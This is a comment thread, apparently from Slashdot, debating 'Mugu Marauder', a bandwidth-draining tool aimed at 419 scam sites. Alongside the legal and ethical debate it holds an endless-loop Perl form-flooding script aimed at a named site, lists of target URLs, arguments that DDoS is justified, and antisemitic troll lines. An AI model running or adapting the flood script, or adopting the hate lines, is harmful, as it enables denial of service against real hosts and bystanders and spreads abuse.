You will however be the target of a DDoS.

Maybe you mean this?

>I once saw a webpage

KaBas fake p2p site killer: [url]http://biphome.spray.se/k.b.e/scamsiteattack. html[/url]

Apparently...

[Tuxedo+Jack]

It assigns a UID when the installer is run.

Each one is something like this:

620ad934fc97bebb65f77bc883211351

That makes me wonder - just what does each one represent?

Re: Apparently...

[Black+Parrot]

> Each one is something like this:

> 620ad934fc97bebb65f77bc883211351

> That makes me wonder - just what does each one represent?

It's either a compressed and encrypted representation of everything on your hard drive, or else a fortune cookie in 4un94r14n 1337.

Re:Apparently...

Good thing it's not trying to assign an IUD. That would be uncomfortable.

Spamming back the scammers?

[Serious+Simon]

What about a program that enables you to automatically send fake responses to a 419-scam e-mail, using different FROM: addresses and variable contents, so they cannot be easily identified as such?

Imagine a 419-scammer sitting in an internet café in Lagos, getting thousands and thousands of mails appearing to be from people genuinely interested in the proposal, and having to follow up on them all just in case one or two are from real persons...

Re:Spamming back the scammers?

Better yet set up a premium rate fax number and ask them to fax you the details. You scam the scammers for hard cash, with no nasty side effects. For good measure you could always set the baud rate on your machine nice and low so it takes longer to send the fax and costs them even more money.

The advantage of just emailing them back of course is that if enough people did it then the scam would stop. Imagine having to sort through 50,000 emails to find the real suckers, rather than a dozen or so. Identifying the real suckers would be like trying to find a needle in the haystack, so they would not be identified and not scammed. At which point the scam no longer works. The downside is that someone could deliberately Joe Job an innocent bystander.

Re:Spamming back the scammers?

[atarian]

Couldn't someone do this with currently available spamware?

Instead of a list of millions of addresses, you just have the 419er's; who has given you explicit permission to reply to them after all, so you can't be accused of actually spamming them.

Re:Spamming back the scammers?

If an innocent bystander was Joe Jobbed, it just means their inbox is flooded, it's not the end of the world like in other, nastier, schemes. And since they're not looking to actually reply to the false responses, then they'll just delete these messages as spam. This solution looks like a win-win.

Re:Spamming back the scammers?

[CdBee]

GSV... You're a Culture fan as well huh?

Re:Spamming back the scammers?

While there are programs that do this, don't spam the 419 scammers unless necessary. All the 419 scammer will do is change email addresses, and that will harm the work of those who are manually baiting and wasting the scammers time.

Re:Spamming back the scammers?

[snorklewacker]

What about a program that enables you to automatically send fake responses to a 419-scam e-mail, using different FROM: addresses and variable contents, so they cannot be easily identified as such?

Different idea (not automated), but some people make it a hobby: http://419eater.com

It's really hilarious stuff.

DHCP

[Joseph_Daniel_Zukige]

In other words, until the person who owns the 0wN3d box decides to power cycle.

Of course, the dropped address will not be picked back up for an hour or so even if it changes.

Re:tsarkon reports DEATH TO ALL JEWS!! Katz must d

[BlkSprk]

WTF is this crap, someone mod it off, erase this hate monger for god sake

Re:MOD PARENT UP!

This would drive up the cost of the scam dramaticly. I love it.

doesn’t work with websense

[capoccia]

websense (at least how it's configured here) blocks access to all the sites mugu is trying to download from. i'll have to try it from home.

No.

[eddy]

No, that's not the one. It predated the Spray screensaver but doesn't exist any more AFAIC.

Re:No.

It was fightspam.nm.ru -- It's 404 now.

Why the pan?

[Joseph_Daniel_Zukige]

The implementation sucks. Who needs a screensaver?

But there's a seed of a good idea here, if you throttle it. It would not take any serious bandwidth hogging to crud up the phishing net with data that the phisher has to carefully check by hand because it could lead the police to him/her. Likewise the spammers. Eat their profits by eating their time.

Taking networks down to squash the cockroach is bad, but there is no reason not to lay a little boric acid out, so to speak.

No mention of today's flash mob or Linux scripts??

[goldfndr]

The site is currently sponsoring a flashmob in celebration of Chinese New Year. It started 2005-02-08 at 16:00:01 GMT and lasts 48 hours.

One of the links from the flashmob page is for bash scripts suitable for Linux/*nix (and presumably OS X et al).

RTFA - It's not a screensaver

Please RTFA.
This program is not a screensaver, it is an application that shrinks to your taskbar.

Dick.

DDOSing is *not* illegal.

[hummassa]

At least, not in my jurisdiction. Anyway, is it illegal in the US? As in, is it a criminal offense? Down here, a DDOS may be considered a civil illicit...

Block list

[blackest_k]

It makes far more sense for a centralised block list, regularly updated, hosted by a reputible body.

A small change in functionality to your web browser so that when you attempt to connect to a site on your blocklist. your browser informs you and the reason why and then asks you if you want to proceed anyway.

its a much more economic use of resources and could be added to by local police agencys as victims become known or perhaps a phishing notify button added to our browsers.

when we wander upon a site thats dodgy that url can be passed on to the hosts of the blocking lists, a site would be verified to prevent malicious use and if checked out as being ok, it wouldnt be reexamined till a certain number of other referals took place.

No waste of bandwidth, no denial of service attack on any site just a hazard warning in your browser that the site may be harmful.

perhaps the banking sites might even care to host such a list.

Re:Block list

[greenpanda]

I always get great ideas like this, only I'm too lazy to do anything about it.

I like the idea of getting the legit banks involved, especially. My bank has always got signs up warning about fake emails etc.

Re:Block list

[Spamalope]

It makes far more sense for a centralised block list, regularly updated, hosted by a reputible body.

A small change in functionality to your web browser so that when you attempt to connect to a site on your blocklist. your browser informs you and the reason why and then asks you if you want to proceed anyway.

Isn't the base problem that the ISPs hosting the 419 sites are unresponsive? Blocking the website's IPs in the browser would be like playing whack-a-mole with spammers. What about SPEWS type listing, stopping traffic to an ever increasing range of IPs at the 419's ISP. That should get the ISP's attention in the same way SPEWS manages - the wallet when legit customers leave.

This will depend on support blocking software for web proxies, and significant adoption. It can't happen overnight, but email blocklists have shown blocklists can grow into an effective force.

Re:Block list

[digidave]

A Firefox plugin could automatically check sites against the blacklist.

I'd be willing to work with some people to do this. Email me if you're interested.

Re:Block list

[mugu_marauder]

Well, the Artists Against 419 have the largest FREE database of fradulent 419 and fake lottery websites on the internet. http://aa419.org/fake-banks/

Perhaps that might be a start for you guys.

Re:Block list

I agree. In fact your Idea has already been implemented. Check out the Netcraft Toolbar

Re:Block list

[Jahz]

"...could be added to by local police agencys as victims..."

You mean the U.S. Secret Service (in the case of bank fraud). Local police lack both the resources and jurisdiction to investigate online fraud (unless both the victim and server are in their district).

Since the Secret Service is a branch of the Treasury Department, they are tasked with financial/bank fraud investigations.

On another note, I still find it interesting that a branch of the Treasury department is tasked with protecting our President and foreign dignitaries. Seems like a job for the DoD or Homeland Security. I love this country.

Re:Block list

I like the idea of getting the legit banks involved, especially.

More often these are just non-existent banks than imitations of the real thing. Imitators (or phishers) can be acted against by the real bank. In cases of completely fictional banks, contact the FSA or Central Bank of the country they claim to be in. :)

You said it all.

[zijus]

Unacceptable in concept and practice. Mod parent up!

On a slightly different subject: I heard about a system which detects email spams, rejects them ,but ask for something like a re-send from the spamming server but.... 1 char by 1 char accepted only at the rate of 1 per second ! This is the same concept (so not acceptable), but at least you overburden the server and not the network.

Z.

Four words

[fleener]

Desperate times. Desperate measures.

Re:You said it all. Oops!

[zijus]

Oops. I meant to reply to very first post. It read:
===
FP by michaelhood (667393) Alter Relationship on Wednesday February 09, @11:03AM (#11616737)

Beware of getting slammed by your ISP with a "friendly" letter, after consuming tons of bandwidth using something like this.
===

They released him?

[famebait]

You mean to say Artists Against 419, after finally capturing Dr. Mugu Marauder, are now releasing him?

As always the "experts" assume too much.

[mugu_marauder]

It is nice to know that the IT industry is full of experts who fail to do the first thing when presented with something new..... Try researching things guys. 1. The Mugu Marauder operates exactly the same as a web browser repeatedly refreshing with no cache on a specified list of target URL's (normally images because they typically have a large filesize compared to HTML pages). 2. The UID number generated for the application is used to tally stats for individual users, so just drop the paranoia. 3. FFS The sites targetted ARE NOT related in any way to legitimate banks. As I said if you did a little research before sprouting your "me too" crap you might realise just EXACTLY The Artists Against 419 are fighting against. 4. A DoS attack is defined as the act of deliberately trying to make a service on the attacked machine unavailable by flooding it with requests, sometimes using deliberately corrupted data packets. Now, I dont know where you tool come from or whether you sympathize with cyber criminals or are simply too dense to comprehend ths. We are downloading images from *CRIMINAL* fake banks after having tried to contact the hoster and shut down these *CRIMINALS* in vain at least two times or mopre. Then, and then only, do we actually start trying to deliberately exceed the allowed bandwidth of these *CRIMINALS*, so they cant use their bogus banks to prey on unsuspecting victims. It is *NOT* an attack on the servers, but on the *CRIMINAL* websites only.

Re:As always the "experts" assume too much.

[ggvaidya]

*cough* innocent until proven guilty in a court of law *cough*

Re:As always the "experts" assume too much.

Easy there Francis....

"It is *NOT* an attack on the servers, but on the *CRIMINAL* websites only."
That statement is not entirely true. You may have unintended consequeces to legitimate sites hosted on the same servers.

I for one agree with the statement that these folks need to be taken down, however, I'm not entirely certain that this is a legal way to resolve the issue. Last time I checked, the activity of DDOS, in and of itself, is not legal. Are you really advocating commission of a crime in answer to a crime?

Re:As always the "experts" assume too much.

[mugu_marauder]

How can there be unintended consequences to other sites on the same server (unless the server admin fuxored up the virtual server config) when the requests from the Mugu Marauder are parsed exactly the same way as a legitimate request for an image.
All the Mugu Maraurder does is download images, therefore increasing the bandwidth used and hopefully maxing out the quota for the site. As a result if a victim of the scam goes there, they might (hopefully) think twice about the scam they are caught up in.

Re:As always the "experts" assume too much.

[JaffaKREE]

Dear Mugu Marauder, My name is dikembe olofandi. I am interested in becoming an investor in your software. However, the money I have is currently locked up by the Nigerian government, and I need several thousand USD ($9,000) dollars in order to get the funds released. I would be extremely willing to share with you a portion of this handsome sum ($5 million USD) in exchange for your trust and generosity. Yours, D. O.

Re:As always the "experts" assume too much.

So when a country's FSA declares a site to be fake, fraudulent, and should be taken down, is that guilty enough for you?

Re:As always the "experts" assume too much.

[j-turkey]

We are downloading images from *CRIMINAL* fake banks after having tried to contact the hoster and shut down these *CRIMINALS* in vain at least two times or mopre. Then, and then only, do we actually start trying to deliberately exceed the allowed bandwidth of these *CRIMINALS*, so they cant use their bogus banks to prey on unsuspecting victims. It is *NOT* an attack on the servers, but on the *CRIMINAL* websites only.

Oh come on, man. First of all, who made you a cop? Are you sworn to uphold the law? I still don't trust you -- I don't trust cops all that much anyway, but vigilantes are unaccountable to any due process of law...dumb. Furthermore, although you may intend to only attack the websites, are you taking any precautions to ensure that it doesn't also affect the servers? ...or do the ends justify the means? Finally, is it OK for other vigilantes to DDoS you since you're breaking the law by DDoS'ing other's sites? What if they went further than DDoS'ing you (it's ok, because you're *CRIMINALS*)? What if a lynch mob came by your house, becuase you're breaking the law?

Re:As always the "experts" assume too much.

[mugu_marauder]

I never said I was a cop.

The sorry thing is that apart from South Africa, law enforcement is useless when it comes to enforcing or even recognising 419 fraud.

Case in point; One of our members had compiled an tracked down a 419 gang operating in the UK. This evidence was taken to the MET who promptly did nothing. The evidence was full correspondence, details of bank accounts owned by the gang, phone numbers, photographs of the gang and their location. And you know what happened, NOTHING!!!

Well, I lie, not exactly nothing, because of the inaction of the MET in acting on the information, this gang managed to extract over 16,000 US dollars out of a victim in Canada.

Now, I don't know about you but something like this really pisses me off and we see it daily, so before you attempt to claim the high moral ground on us take another look at yourself and ask what have I done in the last week to help out others.

Re:As always the "experts" assume too much.

[radish]

It is *NOT* an attack on the servers, but on the *CRIMINAL* websites only.

Right. Because hitting a particular site hard will have no effect on other sites being hosted on the same shared server, or subnet?

Re:As always the "experts" assume too much.

[Dimensio]

*cough* innocent until proven guilty in a court of law *cough*

If you need a court of law to tell you that http://www.tfisec.com/ is a fake bank site, then you need to turn off your computer now.

Re:As always the "experts" assume too much.

thats only for legal matters.

i have the right to judge others without a court of law.

if you cant tell those sites are fake banks, wow, you really need the govt to make every decision for you because you are borderline retarded.

Re:As always the "experts" assume too much.

Since ALL of the sites on the mugu list have been contacted at least twice and have not taken any action against these criminals, I have no sympathy whatsoever. The hosting companies are profiting from the criminals illegal enterprise by hosting their domains. The other domains (if any) on their servers are (possibly unknowingly) contributing to a criminal enterprise by patronizing it, so deserve some discomfort themselves, hopefully enough for them to move their business elsewhere.

Soooo different to Lycos's effort

[Daddy_was_a_donkey]

The lycos thing was a reaction to spam, i.e. something pushed on to the user. Personally I didn't agree with it, but I could understand why people got involved. The 419 scam, however, only works because the sucker, oops, victim, are after something for nothing. They only have themselves to blame and this kind of vigilante action is utterly unjustified. Don't blame the scammers, blame the idiots that fall for it.

Re:Soooo different to Lycos's effort

Perhaps you should do some research into this. Clearly you have only heard about 419 scams that prey on greed. Head over to www.aa419.org and read about some of the other victims of these scammers. They would sell their grandma to get your money from you, and greed although a great motivator, is not the only motivator.

Re:Soooo different to Lycos's effort

[EmagGeek]

Yes, it makes perfect sense to blame victims for the crimes committed against them... The US should adopt this paradigm immediately.. after all, it should be much easier to get rid of the victims than to get rid of the criminals.

Re:Soooo different to Lycos's effort

Uh, if no one responded to spam, that would stop as well. Not really so different.

Take a look at ciribank.co.uk

[NigelJohnstone]

What exactly is the purpose of the frame site ciribank.co.uk?

Re:Take a look at ciribank.co.uk

[jam3s]

It is a poor example of a domain jacking for emails.

Normally you would see a site like www.somebank.com which is the legitimate site. A scammer comes along and registers www.somebank.org or www.somebank.co.uk or some other TLD. Then they point their domain straight at the real site.

This is where it gets useful. They send an email from accounts@somebank.org or whatever TLD they are using saying that your account was overdrawn etc and request you send the money back to account xyz before you get further penalised.

They sign the email, please log in to https://www.somebank.TLD and send it to a lot of emails. The users log in, realise the site is legit (or presume it is) and then follow the instructions.

In this case, ciribank.co.uk is a poor example as it is almost too obvious.

J

Dear Sir

[Flakeloaf]

Dear Verizon Subscriber:

I am Dr. Muntange Dwambo, the nephew of the director of your internet service provider's Accepatble Use Enforcement division.

It has come to our attention that you are consuming an unusual amount of bandwidth. I am therefore here to give you a one-time opportunity. My uncle has recently passed away, and left me in control of THREE HUNDRED THOUSAND GIGABYTES PER MONTH of bandwidth. Unfortunately that bandwidth is only available to Verizon subscribers, and that company does not yet offer their services in my native Nigeria.

Re:Dear Sir

[StringBlade]

How much do you need Dr. Dwambo? Just name your price - no amount is too large!

Where are all the Script Kiddies?

[silence535]

Why are they not using their botnets to DDOS the phishing sites and spammers?

I mean, then MS security vulnerabilities would suddenly make sense.

-silence

Pointless again...

[Da+Web+Guru]

Of course, this will have no real impact on taking down phishing sites. The people that set up most phishing sites follow these simple steps:

1) Find a vulnerable server and root it, or get just enough access (through something like a phpBB exploit) to upload a phishing site to the right directory. They will end up with a URL that probably looks like "http://aaa.bbb.ccc.ddd/online/wamu.html". Phishing sites don't bother with mundane details like DNS or domains (waste of time and energy) because the URL will be conviently hidden with javascript by your favorite HTML email client anyway.

2) Repeat the above step as often as you like to have a "cluster" of phishing sites.

3) Send out tons of spam advertising the phishing sites, randomly picking one of the above URLs to use for the login page.

4) By the time the phishing sites are detected, reported, and disabled (could be as long as a week or two or four), hundreds of people could have attempted to log into each of the fake login sites.

5) In most cases, the owner of the server being used for the phishing site is completely oblivious of the phishing site. (The rest of their web sites are working fine, so why should they be aware of any problems?) DDoS'ing them will only attack a confused victim.

Re:Pointless again...

[mugu_marauder]

SIGH
This is not targetting phishing.
Gee, I wish some of you would read. This is about Nigerian Scams and Advanced Fee Fraud otherwise known as 419 scams.

Re:Pointless again...

The are related..

http://freespace.virgin.net/scam.baiter/benson_i ke m_300904b.mp3

Re:Pointless again...

[Da+Web+Guru]

That's what I get for posting after being up all night working...

Well, a couple of my points still apply. Such as the fact that a server owner may or may not be aware of the content hosted on their customers' web sites until after their box has been flooded off the Internet. I actually read through the site to see how it works, but right now one of the links (from the FAQ page) that lists their targets is 404'ed at the moment. The other one (which is also showing PHP errors) lists over 2000 taken down, but given the ease of which a new domain name could be acquired, redesigned, and pushed online, this appears to only be a stopgap measure anyway.

Re:Pointless again...

[jam3s]

Server owner shmerver owner. I think you will find that the sites targetted by this application are the ones which are uncooperative. They have the right to support scammers, as jurisdiction usually doesnt extend to their profiteering so it leaves little alternatives. Thousands of sites are shutdown by crews like www.419legal.org and www.aa419.org as the hosts co-operate under the weight of authority presented. These sites being drained are the ones who ignore the requests for shutdown / encourage scammers with "bulletproof" hosting.

Re:Pointless again...

[mugu_marauder]

Such as the fact that a server owner may or may not be aware of the content hosted on their customers' web sites until after their box has been flooded off the Internet.

Not quite, the targets are selected AFTER the hosts are notified on the content of the sites and who fail to act on our complaints. Our notifications contain fully presented evidence as to the legitimacy of the site in question. Most often the site breaches the hosts OWN AUP (or similar document). Other evidence presented is how the site is not listed in financial services regulator databases (depending on what claims the site makes in relation to its aparent location on the planet). There are also many, many other things that are used as evidence to the host.

The bandwidth tools like the Lad Vampire and Mugu Maraurder are a the last in a long line of steps we use.

Re:Pointless again...

[http101]

These are all valid ideas, but the one thing that's keeping the typical user from really knowing what the hell they're clicking on, is that homograph exploit. As long as network.enableIDN is set as "true" in Mozilla config, the typical user won't know the difference.

Of all the things...

[Tavor]

"Artists Against 419"? Now I know a lot of artists do good things, but this frankly sounds fishy. Consider this:

The legality of this is in question

You *must* be connected to the Internet to use

Having lots of bandwidth is preferable

You connect to lots of other computers, likely more than the user is aware of.
What does this remind you of? Exactly, what the RIAA has tried to paint as the 'Artists enemy #1'... Filesharing! Unless someone can go through and confirm that this screensaver is indeed clean, I for one am going to avoid it like the plauge. I know this has sounded like a bunch of FUD, but on a Windows box having an app 'phone home' is easy. There are also so many other good points, which I'm not going to rehash... I'm just saying to THINK before you act!

Re:Of all the things...

If you're really so paranoid as to be worried about "secret file sharing" (what, is it supposed to steal your mp3 files without your knowledge? come on!), there are alternatives -- just run the Lad Vampire in a browser window!

Or don't partcipate. Completely up to you.

Re:Of all the things...

Or be a slashbot and just post your paranoid anti-BSA/RIAA/MPAA/etc rants on slashdot.

You could use this software....

[AviLazar]

or just link the offending website on /.

THE ORIGINAL BANKSCAMMER ON PHONE RECORDING!!!

http://freespace.virgin.net/scam.baiter/benson_ike m_300904b.mp3

Somebody else is a dumbass.

[Kickasso]

THEY can't use your bandwidth. YOU use it by running javascript and suchlike crap you download from them. You don't have to, unless you're a dumbass.

Re:Somebody else is a dumbass.

[DrunkenTerror]

From http://aa419.org/content/bandwidth.php:

"Every image on our web site is hosted on a 419er's server."

So when you load their website, it also pulls images from 419-scam sites. Do you understand?

How to solve the problem

[UES]

The 'Mugu Problem' will go away just as soon as people stop being so greedy (I can make $40MM through fraud with no effort!), stupid (complete strangers surely want to give me millions of dollars for no reason, I better volunteer all my banking information!) and racist (it'll be easy to rip off a bunch of dumb Africans, there's no risk to me!). A better use of people's computing time is educating your friends and family about the nature of 419 scams. The best way to defeat con men is to know the nature of the con ahead of time so you can recognize it.

This message brought to you by a grant from the the David Mamet Foundation.

Re:How to solve the problem

[mugu_marauder]

So why don't you join in with scambaiters over at 419eater.com

Re:How to solve the problem

[jam3s]

I don't even want to start with what is wrong with your logic here. Perhaps the fact that not all - thats right, not all 419 scams are predicated on greed. There are plenty of other scams, such as fake charities, fake lotteries, illness / disease, revolutionary cures, Tsunami assistance crews - LOTS OF THEM.

You seem like an intelligent guy who could pick a scammer out of a lineup of cyber-perps, so why do you think all of their scams are targetted at greedy, stupid, racists people?

Re:How to solve the problem

A reasonable question.

I am deeply amused by the 419eater crew, and I've visited that page in the past. But one of the key elements of the 419 scam, as I am sure you are aware, is the lack of law-enforcement followup in Nigeria. 419eater is not a law-enforcement agency. Many of the things they do are risky and invite retribution from dangerous hardened criminals, which they even admit. If tickets from Lagos to London were cheaper, I think many of them would be in fear of their lives.

Scammers have free rein to continue to scam because they are not taken seriosuly in their country of origin. Like the drug problem in the U.S., you can never eliminate all the growers/scammers. But if you dry up the customer base, 419ers will move on to something that gives greater reward for less effort. They can't even scam you in the first place if you don't write them back.

Re:How to solve the problem

[mugu_marauder]

We acknowledge that we will never get an arrest over there, but the more scambaiters there are plying their trade in fustrating the scammers.

The most fustrating thing is the fact that the ARE victims. I used to think that people were able to see through the endless emails, but after scambaiting for the last 18 months I am now of the opinion that the majority of the population on this planet ARE stupid enough to fall for scams (I include ALL types of scams here, not limited to 419).

Re:How to solve the problem

[lifespan]

You seem like an intelligent guy who could pick a scammer out of a lineup of cyber-perps, so why do you think all of their scams are targetted at greedy, stupid, racists people?

Maybe he read the conclusion of this official statement by the Nigerian Embassy about 419 scams. It appears to be an exercise in whitewashing (no pun intended) all victims of 419ers as greedy unscrupulous collaborators.

http://www.nigeriaembassyusa.org/419statement.shtm l

The introduction even goes so far as to blame negative publicity about 419 causing poor foreign investment in Nigeria!! Unreal. I think the number of bullets flying around there contributes more to low foreign investment.

Which do you think is the greater evil? Believing an unbelievable story or defrauding, ransoming then killing a human.

Re:tsarkon reports DEATH TO ALL JEWS!! Katz must d

You must be Jew here!

Hahahahahah, I fuckin' kill me!

Re:I disagree, It's actually a good idea

[Arcturax]

That's like going into a drug inflicted neighborhood and punching all the other innocent residents in the face every day until they go get rid of the local crack house themselves.

Here Here

Come on j00 5| /\/\a|) 1337 5|<1|_|_z to use for good, not evil

Technically...

[http101]

...this is known as a DDoS or a "Distributed Denial of Service" attack. Most ISPs will cancel your account and blacklist you for things like this. Use at your own risk!

Comment removed

[account_deleted]

Comment removed based on user account deletion

Who does this hurt?

[StyroCupMan]

The fake sites for which I have viewed the source do not tend to hold their own graphics. They link to the graphics on the official site (bank, ebay, whatever). Won't this just suck up the bandwidth of the real site?

Re:Who does this hurt?

[mugu_marauder]

Take a look at the targets list on the following page.

http://www.aa419.org/mm/

Tell me where a "real" site is listed there, each and every URL targetted belongs to the FAKE site.

Vigilante Justice?

[nurb432]

At least with real vigilantes, they don't take out an entire neighborhood of innocent people just to get one person..

The collateral damage on these sorts of things make the 'attackers' ( there is no better word for them ) no better then the scammers they are going after...

Re:Vigilante Justice?

This is the Falluja Theory.
Get rid of the bad guys or lose the neighborhood. :)

man wget

[Kickasso]

/-D

Why is BOA missing?

[ZeeExSixAre]

I noticed that Bank of America (admittedly huge) isn't in the list of banks spoofed. Why is that? Do they have their own private fraud division or something, or has something bad happened to spoofers in the past?

Re:Why is BOA missing?

Do you have a URL of a Bank of America imitator?

If a URL isn't on the list, either:
- aa419.org doesn't know about it
- it was shut down through complaints to the hoster (either from aa419.org, a FSA, or the site being spoofed)

Re:Why is BOA missing?

[mugu_marauder]

The BOA site you refer to is related to phishing, NOT Advanced Fee Fraid.

AA419 target Advanced Fee Fraud, otherwise known as 419 or Nigerian email fraud. Nothing else.

I agree with you...and a question..

Is this the shipping junk one you are referring to? What is its current status? Last I heard they were more interested in shipping junk and doing verbal abuse then getting the UK lads arrested.

I haven't followed it since they blamed 419eater for having it screwed with due to a unknown at the time board exploit allowing someone to get into their email, and due to their site's hostility against 419eater.

Here is a mirror for the program

[imcdona]

Here is a mirror for the program http://asterisk.t28.net/mm-08.exe

Definition of Mugu

[MoNickels]

For those interested, here's a definition of mugu. It's a self-link.

Yeah right.

[Kickasso]

Let's just go ahead and hang all the people who we think might be criminals. Vigilante justice is soooo cool.

anonymous

[glassesmonkey]

Seems to me that filling their dB with useless information would be more effective. (Increasing the victim to fake ratio). These forms are where they are actually taking bank acct numbers. Taking their bandwidth is s temporary band-aid when they are opening webhosting accounts for free, or at most $5.

Couldn't someone make a bookmarklet or javascript to fill forms with fake info? Here are some of the forms they use to get personal information.

http://www.raboswiss.com/housec/ACCSETUP.HTM
http://www.swissroyallbank.com/onlinebanking/getst art.php
http://www.kashbankcorp.com/contact_us.php
http://www.alphapbonline.com/aibb/online_servces.h tm
http://www.alliance-ctb.com/ebank/apply.asp
http://www.libertystrongholdgroup.com/aindex.html
http://www.fichnet.net/contact.php

Re:anonymous

[imcdona]

How about something like this: #!/usr/bin/perl $loop = "1"; $a = "1"; use WWW::Mechanize; while ($loop > 0){ $a++; use WWW::Mechanize; my $mech = WWW::Mechanize->new(); $mech->get( "http://finale.savagequote.com/?name=vn" ); $mech->success or die $mech->response->status_line; $mech->form_number ( 1 ); $mech->field ( data_order => "fname,lname,address,city,state,zip,hphone_area,hp hone_prefix,hphone_suffix,wphone_area,wphone_prefi x,wphone_suffix,email,amount,propvalue,loantype,pr oplocation,creditrating,proptype,propuse,propzip" ); $mech->field ( partid => "vn" ); $mech->field ( fname => "You" ); $mech->field ( lname => "Spammedme" ); $mech->field ( address => "Stop spamming me" ); $mech->field ( city => "Spammers" ); $mech->field ( state => "DC" ); $mech->field ( zip => "35879" ); $mech->field ( email => "yousapmmed\@me.com" ); $mech->field ( hphone_area => "888" ); $mech->field ( hphone_prefix => "333" ); $mech->field ( hphone_suffix => "5555" ); $mech->field ( creditrating => "1" ); $mech->field ( homeowner => "1" ); $mech->field ( homevalue => "1025000" ); $mech->field ( propertytype => "1" ); $mech->field ( mortgage1 => "47500" ); $mech->field ( currentinterestrate => "14.25" ); $mech->field ( loanamountdesired => "1025000" ); $mech->field ( loanpurpose => "7" ); $mech->field ( submit => "Get Quoted" ); $mech->submit(); $mech->success or die "post failed: ", $mech->response->status_line; } Run severl instances of somthing like that......

Re:anonymous

[imcdona]

OOPS....here is what I meant.....

#!/usr/bin/perl
$loop = "1";
$a = "1";
use WWW::Mechanize;

while ($loop > 0){
$a++;

use WWW::Mechanize;
my $mech = WWW::Mechanize->new();

$mech->get( "http://finale.savagequote.com/?name=vn" );
$mech->success or die $mech->response->status_line;

$mech->form_number ( 1 );
$mech->field ( data_order => "fname,lname,address,city,state,zip,hphone_area,hp hone_prefix,hphone_suffix,wphone_area,wphone_prefi x,wphone_suffix,email,amount,propvalue,loantype,pr oplocation,creditrating,proptype,propuse,propzip" );
$mech->field ( partid => "vn" );
$mech->field ( fname => "You" );
$mech->field ( lname => "Spammedme" );
$mech->field ( address => "Stop spamming me" );
$mech->field ( city => "Spammers" );
$mech->field ( state => "DC" );
$mech->field ( zip => "35879" );
$mech->field ( email => "yousapmmed\@me.com" );
$mech->field ( hphone_area => "888" );
$mech->field ( hphone_prefix => "333" );
$mech->field ( hphone_suffix => "5555" );
$mech->field ( creditrating => "1" );
$mech->field ( homeowner => "1" );
$mech->field ( homevalue => "1025000" );
$mech->field ( propertytype => "1" );
$mech->field ( mortgage1 => "47500" );
$mech->field ( currentinterestrate => "14.25" );
$mech->field ( loanamountdesired => "1025000" );
$mech->field ( loanpurpose => "7" );
$mech->field ( submit => "Get Quoted" );
$mech->submit();

$mech->success or die "post failed: ",
$mech->response->status_line;

}

Re:anonymous

[josath]

It's a good start, but it needs:

* Easy way to target new URLs, either through reading a text file or command line

* Automatic recognition of the form fields: I don't want to have to look through HTML code to find out "loanamountdesired", "fname", etc

* Randomly generated, real-looking data. Maybe just come up with a nice long list of first & last names, street names, cities, and states, and then put in random numbers for the fields that take numeric input. If all you do is put in 10000 entries where fname=="Spammedme", they could easily filter those out.

If something like this were written, I would keep in running 24/7, and I know many other people would be gratefull too. This would work not only for nigerian scammers, but any spammer website that sells things.

Good luck!

Re:I disagree, It's actually a good idea

Damn, that sounds like a good idea. Kind'a like Training Day, but different.

Re:I disagree, It's actually a good idea

[pe1chl]

Even better! When this happens often enough, the ISP will seriously re-consider if they want to offer free or nearly-free webhosting to anonymous customers.

Re:I disagree, It's actually a good idea

[pe1chl]

It is more like finding who offers the housing in that neighborhood and convincing them that they should not rent to offenders.

Re:I disagree, It's actually a good idea

[Atzanteol]

Off toipic, that's not such a bad idea.

Quite often community involvement is the best way to clean up certain neighborhoods.

Not a slippery slope at all...

[StevenMaurer]

There's a critical difference between DDOSing a 409 scammer and DDOSing people you don't like politically. 409 scamming is illegal.

This is only a slippery slope if you think crooks who accidentally drop their guns at the scene of the crime - and go back to ask for it back the next day - have a "point" (it's their property after all!). For the rest of us, we understand that DDOSing democrats.org or gop.org is much more likely to get you in legal trouble than doing that to some random phisher. And rightly so.

Design issues

[abb3w]

I would hope that the screensaver would be designed such that after one file not found error, it would no longer try to retrieve that file.

I'd suggest a doubling delay time; start with a delay of 60 seconds -- a normal browser timeout-- after the fifth failure trying to load an image. If the picture doesn't load the next time, a two minute delay. Try again, four minutes. Probably cap it at 1024 minutes-- a little under a day, just because. In any case, such a delay would prevent a temporary /.ing from being only temporary, or prevent a 419er from making the problem go away by turning off his site for a day. On the other hand, it reduces load on a mistargetted site ~1000 fold, provided they don't have a similarly named image file.

Of course, it's only a question of time before some 419 site maker begin using the same tricks as p0rn sites do to prevent picture leeching (not work safe) from working, and hand back a 1x1 white bitmap to any off-site picture request. At which point, the Lad Vampire will need to check the next pocket.

great, this is exactly what i was afraid would....

[iamhassi]

Like I posted months ago, what if the Lycos idea was used against other sites?

This software allows you to do exactly what I predicted: you can put in any site you want and it'll start leeching from that site. Now all we need is a few dozen people to start leeching from some website they don't like, for example, some guy's private site who is unpopular on a forum, and you're looking at huge server bills and likely the site would be shutdown within a day if bandwidth went from a few megs a day to gigabytes a day.

Let's do the math: 50 people x 100 mB a day (I'm being very conservative here, since it depends on the size of the images the program is going after) = 5 gB a day x 30 days a month = 150 gB a month.

That's a giant bandwidth bill, and like I said I'm being very conservative, a lot of people aren't knowledgeable enough to compress or resize images to smaller sizes (especially if they're on broadband and don't notice how fast the 500 kbyte image uploads to their geocities, etc, site), and depending on how often that program leeches from the sites that 100 mB could be closer to 1000 mB if not more, how would you like a bill for 1500 gB of bandwidth? How will this effect small businesses who pisses off a customer who tells all his little buddies?

Re:great, this is exactly what i was afraid would.

[mugu_marauder]

Just to clarify things (again SIGH!) the targets list is defined by The Artists Against 419 and NO-ONE else.

Armies

Do the armies around the world have a program like this to target their axis ?

Never work

[anticypher]

Too many things wrong with this.

First, a slashdot effect only last a few hours. To really hit a site, the editors would need to describe the link as a photo site of Nathalie Portman dumping a bowl of hot grits down her pants.

But after a few fake postings like that, /.ers would stop following links.

Then you have the stories posted by Michael, which would have his bizarre editorial comments to drive people away.

Even worse, over the next weekend, Commander Toco, who never reads his own site, would post a duplicate causing a newly cleaned up site to have a second slashdotting.

the AC

slashdot makes an effective one time weapon

Re:An Easier Idea

haha!

Re:tsarkon reports DEATH TO ALL JEWS!! Katz must d

[Goeland86]

no. I'm not Jew and I hate nazis all the same. /. is not a hating place. if you want to display something like this, get your own stupid website and find ways to attract people to it. Don't force people to see a sign of hatred on a news site. You're just a fucking ass that doesn't understand what a nightmare that sign can be.

Re:great, this is exactly what i was afraid would.

[iamhassi]

" Just to clarify things (again SIGH!) the targets list is defined by The Artists Against 419 and NO-ONE else."

run the program moron, you can put any address in you want.

Re:great, this is exactly what i was afraid would.

[iamhassi]

